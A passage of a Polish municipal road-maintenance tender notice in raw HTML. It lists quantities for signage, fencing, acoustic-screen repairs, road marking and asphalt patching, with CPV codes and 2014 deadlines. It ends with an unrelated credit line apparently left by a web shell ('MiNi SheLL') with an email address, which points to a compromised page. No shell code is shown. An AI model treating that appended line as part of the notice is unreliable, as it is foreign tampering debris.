Pionowe znaki drogowe - drogowskazy jednoramienne o pow. ponad 0.3 m2 (EiF)	szt.-	10
Pionowe znaki drogowe - drogowskazy jednoramienne o pow. do 0.3 m2 (tabliczki z nazwami ulic)	szt.-	30
Pionowe znaki drogowe - zdjęcie znaków lub drogowskazów	szt.-	300
Prostowanie znaków	szt.-	350
Urządzenia bezpieczeństwa ruchu - progi zwalniające U-16 m z tworzywa sztucznego z wyklejonymi pasami odblaskową taśmą o wym. 900x500x50	szt.-	20
Montaż lustra U-18a śr. 800mm	szt.	-5
Poręcze ochronne łańcuchowe pojedyncze o rozstawie słupków z rur śr. 60 mm co 1.5 m	m	-30
Słupki do znaków drogowych z rur stalowych o śr. 100 mm-słupki blokujące	szt.-	20
wyklejenie witacza folią samoprzylepną kolor ORACAL 090 seria 851	m2-	20
naprawa ekranów akustycznych-demontaż belki podwalinowej betonowej prefabrykowanej z betonu B 30 (H=0,45m)	szt-	1
naprawa ekranów akustycznych-montaż belki podwalinowej betonowej prefabrykowanej z betonu B-30 (H=0,45m)	szt-	1
naprawa ekranów akustycznych pełnych-demontaż paneli pełnych z blachy aluminiowej (kasety metalowe FAMA-2) wypełnionych wełną mineralną (H=3,8m)	szt	-1
naprawa ekranów akustycznych pełnych- montaż nowych paneli pełnych z blachy aluminiowej (kasety metalowe FAMA-2) wypełnionych wełną mineralną (H=3,8m)	szt	-1
naprawa ekranów akustycznych- montaż  paneli istniejących	szt	-1
naprawa ekranów akustycznych z paneli przezroczystych typu PLEXIGLAS SOUNDSTOP XT gr. 15mm -demontaż	szt	-1
naprawa ekranów akustycznych z paneli przezroczystych typu PLEXIGLAS SOUNDSTOP XT gr. 15mm -montaż	szt	-1
Montaż ogrodzenia segmentowego U-12 a (0,8-1,0m)	m-	20,0
Montaż ogrodzenia segmentowego U-12 a (1,2 -1,5m)	m	-20,0
Montaż ogrodzenia segmentowego U-11 a 	m	-20,0
Bieżące utrzymanie oznaczeń pionowych - organizacja ruchu tymczasowa		
montaż słupka do znaku	szt	-50
demontaż słupka do znaku	szt-	50
montaż tablic znaków Ai D	szt-	50
demontaż tablic znaków Ai D	szt-	50
montaż tablic znaków B i C	szt-	50
demontaż tablic znaków B i C	szt-	50
montaż tablic znaków E i F	szt-	10
demontaż tablic znaków E i F	szt-	10
montaż barier drogowych -zastaw U-20a	mb-	100
demontaż barier drogowych -zastaw U-20a	mb	-100
montaż tabliczki pod znakiem	szt	-30
demontaż tabliczki pod znakiem	szt-	30
wykonanie wygrodzenia z taśmy biało czerwonej	mb-	50
demontaż wygrodzenia z taśmy biało czerwonej	mb	-50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> bieżące utrzymanie oznaczeń poziomych (linie segregacyjne, przejścia dla pieszych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Oznakowanie poziome jezdni farbą chlorokauczukową - linie segregacyjne i krawędziowe ciągłe malowane mechanicznie	m2-	700
Oznakowanie poziome jezdni farbą chlorokauczukową - linie segregacyjne i krawędziowe przerywane malowane mechanicznie	m2-	500
Oznakowanie poziome jezdni farbą chlorokauczukową - linie na skrzyżowaniach i przejściach dla pieszych malowane mechanicznie	m2-	2300
Oznakowanie poziome jezdni farbą chlorokauczukową - strzałki i inne symbole malowane ręcznie	m2-	1250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Bieżące utrzymanie dróg utwardzonych - odcinkowe wykonanie remontów nawierzchni bitumicznej masą mineralno asfaltową.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozebranie podbudowy z mas mineralno - bitumicznych gr. 0-4cm mechanicznie 	m2-	5000
Wyrównanie istniejącej podbudowy mieszanką mineralno - bitumiczną mechanicznie	Mg-	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.42-6, 45.23.32.20-7, 45.23.32.52-0, 45.23.32.23-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com